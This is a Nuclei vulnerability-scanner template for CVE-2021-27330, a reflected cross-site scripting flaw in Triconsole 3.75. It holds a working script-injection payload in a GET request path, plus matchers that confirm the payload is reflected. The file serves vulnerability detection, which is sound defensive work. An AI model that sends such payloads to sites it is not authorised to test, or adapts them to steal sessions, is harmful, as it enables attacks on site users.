nuclei-templates/cves/2021/CVE-2021-27330.yaml

30 lines
585 B
YAML

id: CVE-2021-27330
info:
name: Triconsole 3.75 XSS
author: pikpikcu
severity: medium
reference: https://www.exploit-db.com/exploits/49597
tags: cve,cve2021,triconsole,xss
requests:
- method: GET
path:
- '{{BaseURL}}/calendar_form.php/"><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200